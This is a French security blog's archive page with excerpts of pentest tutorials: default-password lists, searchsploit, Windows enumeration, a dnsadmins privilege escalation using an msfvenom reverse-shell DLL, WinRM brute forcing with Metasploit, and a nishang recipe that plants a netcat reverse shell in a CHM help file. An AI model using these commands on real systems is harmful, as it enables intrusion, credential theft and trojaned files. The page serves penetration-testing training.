Sécuriser votre site

Connaître son ennemi
Menu
  • Active Directory
  • Aide-mémoire
  • Antivirus
  • Apparmor
  • Backdoor
  • Enfants
  • Engin de recherche
  • Énumération
  • Exploit
  • Liens
  • Linux
  • Non classé
  • OSINT
  • Powershell
  • Python
  • Ruby
  • Shells
  • Transfert de fichiers
  • Utilitaire
  • Virus
    • Analyse
    • VM
  • Windows
  • Windows Server

Mois : mai 2021

Mots de passe par défaut d’applications

Mots de passe par défaut d’applications

https://github.com/ihebski/DefaultCreds-cheat-sheet http://www.phenoelit.org/dpl/dpl.html http://www.vulnerabilityassessment.co.uk/passwordsC.htm https://192-168-1-1ip.mobi/default-router-passwords-list/ https://datarecovery.com/rd/default-passwords/ https://bizuns.com/default-passwords-list https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv https://www.cirt.net/passwords http://www.passwordsdatabase.com/
Full Article
Pas de commentaire
Liens et applications pour trouver des exploits

Liens et applications pour trouver des exploits

Recherche d’exploits sur exploitdb à partir de la console searchsploit "linux Kernel" #Exemple searchsploit apache mod_ssl #Un 2e exemple searchsploit -m 47080 #Copier l'exploit dans le répertoire courant searchsploit -p 47080 #Affiche le chemin complet de l'exploit searchsploit -x 47080 #Ouvre vi pour éditer l'exploit searchsploit …
Full Article
Pas de commentaire
Faire un audit des mots de passe sur Windows

Faire un audit des mots de passe sur Windows

Il est important de savoir ce qu’un attaquant pourrait retrouver sur votre poste de travail advenant le cas d’un intrusion réussi. Les mots de passe sont la plupart du temps encryptés, mais si ceux-ci sont trop courts, facilement devinables ou basés sur un mot de passe …
Full Article
Pas de commentaire
Quelques commandes Windows pratiques pour l’énumération

Quelques commandes Windows pratiques pour l’énumération

Vous pouvez énumérer tout ce qui se trouve ici avec le logiciel WinPEAS, mais voici une idée de ce que l’on peut trouver d’intéressant avec ce logiciel. Variables d’environnement set dir env: Get-ChildItem Env: | ft Key,Value Historiques de commandes powershell ConsoleHost_history #Find the PATH where …
Full Article
Pas de commentaire
Exploiter le compte d’un utilisateur faisant partie du groupe dnsadmins pour devenir administrateur

Exploiter le compte d’un utilisateur faisant partie du groupe dnsadmins pour devenir administrateur

Si un utilisateur fait partie du groupe dnsadmins sur un DC, nous pouvons obtenir le compte administrateur de cette façon: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.11 LPORT=8888 -f dll > germain.dll nc -nlvp 8888 Vous pourriez tester la dll en la copiant sur le serveur Windows et en …
Full Article
Pas de commentaire
Trouver un mot de passe SMB avec metasploit par la force brute

Trouver un mot de passe SMB avec metasploit par la force brute

service postgresql start msfconsole use auxiliary/scanner/winrm/winrm_login set rhosts 10.10.10.10 set user_file /home/germain/users_list set password TheDefaultPasswordToTry! run evil-winrm -u user_found -p TheDefaultPassword! -i 10.10.10.10
Full Article
Pas de commentaire
Installer powershell sur  linux et se connecter sur Windows

Installer powershell sur linux et se connecter sur Windows

Si Evil-WinRm ne fonctionne pas car le port 5985 n’est pas ouvert : nous pouvons utiliser Powershell pour Linux pour se connecter. sudo apt install gss-ntlmssp sudo apt-get install powershell nc -nvlp 9001 pwsh $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential germain Enter-PSSession $offsec_session PS> …
Full Article
Pas de commentaire
Utilitaire smbclient

Utilitaire smbclient

Souvent, le service SMB (Service Message Block) est disponible via le port TCP 445 lors d’une analyse. SMB est utilisé pour le partage de fichiers que ce soit sur Windows et Linux. Malheureusement, ce service possède plusieurs vulnérabilités connus. L’erreur la plus fréquente est un erreur …
Full Article
Pas de commentaire
Mettre un shell dans un fichier d’aide CHM

Mettre un shell dans un fichier d’aide CHM

D’abord, il faut installer le HTML Help Workshop et télécharger le code powershell : https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1 import-module .\out.chm.ps1;out-chm -Payload "C:\tmp\nc.exe -e powershell 10.10.10.10 4444" -HHCPath "C:\Program Files (x86)\HTML Help Workshop" nc -nlvp 4444 #sur l'attaquant quand quelqu’un ouvrira le fichier d’aide, nous aurons un shell
Full Article
Pas de commentaire
Configurer un serveur SAMBA sous Linux

Configurer un serveur SAMBA sous Linux

locate samba | grep conf nano /etc/samba/smb.conf cat smb.conf :      security = user      map to guest = bad user      bind interfaces only = yes      encrypt passwords = yes      name resolve order = bcast host      workgroup = WORKGROUP      winbind use …
Full Article
Pas de commentaire

Navigation des articles

1 2 3 4 5 Next

Articles populaires

blogs chercher de façon différente code Enfants engin de recherche engins de recherche entreprises fils de discussion flare forums inetsim InfluxDB installation IOT' internet des objets kids meta médias sociaux OSINT pays personnes programmation recherche REMnux semblable site sock puppet xclip

  • Active Directory
  • Aide-mémoire
  • Analyse
  • Antivirus
  • Apparmor
  • Backdoor
  • Enfants
  • Engin de recherche
  • Énumération
  • Exploit
  • Liens
  • Linux
  • Non classé
  • OSINT
  • Powershell
  • Python
  • Ruby
  • Shells
  • Transfert de fichiers
  • Utilitaire
  • Virus
  • VM
  • Windows
  • Windows Server

Articles récents

  • L’importance de la sécurité informatique dans une petite entreprise
  • L’importance d’embaucher un spécialiste de la sécurité informatique
  • L’importance de la sécurité informatique dans une petite et moyenne entreprise
  • Activation des journaux (logs) de Windows pour la détection de virus en mémoire
  • Engin de recherche pour le contenu sur telegram

Archives

  • février 2023
  • novembre 2022
  • juillet 2022
  • avril 2022
  • mars 2022
  • septembre 2021
  • août 2021
  • juillet 2021
  • juin 2021
  • mai 2021

Sécuriser votre site

Connaître son ennemi
Copyright © 2023 Sécuriser votre site
Article par

Ad Blocker Detected

Our website is made possible by displaying online advertisements to our visitors. Please consider supporting us by disabling your ad blocker.

Refresh
Gérer le consentement aux témoins
Nous utilisons des technologies telles que les témoins pour stocker et/ou accéder aux informations relatives aux appareils. Nous le faisons pour améliorer l’expérience de navigation et pour afficher des publicités personnalisées. Consentir à ces technologies nous permettra de traiter des données telles que le comportement de navigation ou les identifiants uniques sur ce site. Le fait de ne pas consentir ou de retirer son consentement peut avoir un effet négatif sur certaines fonctionnalités et caractéristiques.
Fonctionnel Toujours activé
Le stockage ou l’accès technique est strictement nécessaire dans la finalité d’intérêt légitime de permettre l’utilisation d’un service spécifique explicitement demandé par l’abonné ou l’utilisateur, ou dans le seul but d’effectuer la transmission d’une communication sur un réseau de communications électroniques.
Préférences
Le stockage ou l’accès technique est nécessaire dans la finalité d’intérêt légitime de stocker des préférences qui ne sont pas demandées par l’abonné ou l’utilisateur.
Statistiques
Le stockage ou l’accès technique qui est utilisé exclusivement à des fins statistiques. Le stockage ou l’accès technique qui est utilisé exclusivement dans des finalités statistiques anonymes. En l’absence d’une assignation à comparaître, d’une conformité volontaire de la part de votre fournisseur d’accès à internet ou d’enregistrements supplémentaires provenant d’une tierce partie, les informations stockées ou extraites à cette seule fin ne peuvent généralement pas être utilisées pour vous identifier.
Marketing
Le stockage ou l’accès technique est nécessaire pour créer des profils d’utilisateurs afin d’envoyer des publicités, ou pour suivre l’utilisateur sur un site web ou sur plusieurs sites web ayant des finalités marketing similaires.
Gérer les options Gérer les services Gérer les fournisseurs En savoir plus sur ces finalités
Voir les préférences
{title} {title} {title}